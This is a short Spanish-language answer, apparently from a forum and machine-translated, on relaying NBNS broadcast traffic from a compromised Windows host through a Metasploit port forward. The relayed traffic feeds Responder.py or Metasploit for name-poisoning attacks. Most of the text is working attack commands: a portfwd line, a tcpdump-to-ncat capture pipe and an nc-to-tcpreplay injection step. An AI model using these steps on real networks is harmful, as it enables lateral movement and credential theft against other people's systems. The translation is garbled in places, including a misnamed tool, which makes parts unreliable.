ya que tanto responder.py
como metasploit escuchan en su máquina host los paquetes de nbns de difusión que necesita para hacerlos creer que forman parte de su propia red. (Suponiendo que las respuestas se crean como sockets udp, de lo contrario también tendrá que cambiar ese código)
la forma en que los engañaría es usando tcpdump
con un nc en la máquina remota y transmitirlo directamente a la interfaz usando tcpreply
.
necesita reenviar un puerto desde el host remoto, esto debería ser bastante fácil usando el puerto metasploit hacia adelante, necesita vincular un puerto local al localhost en la máquina remota.
dentro de metasploit:
portfwd -l 1234 -p 1234 -r 127.0.0.1
luego, debe usar ncat
y tcpdump
en la máquina remota para que el tráfico nbns se reenvíe a usted (observe que el filtro debe eliminar los paquetes que inyectará, de lo contrario tendrá un bucle) :
tcpdump -i [interface number] -vv -s 0 port 137 and ether host ff:ff:ff:ff:ff:ff|ncat -l 127.0.0.1 1234
y luego necesitas inyectarlo en tu propia interfaz, nc
se usa para transmitir desde el ncat
en el host de Windows y tcpreply
se usa para inyectar los paquetes:
nc 127.0.0.1 1234 | tcpreply -i lo -
y ejecuta tu metasploit/responder.py
en la interfaz lo
.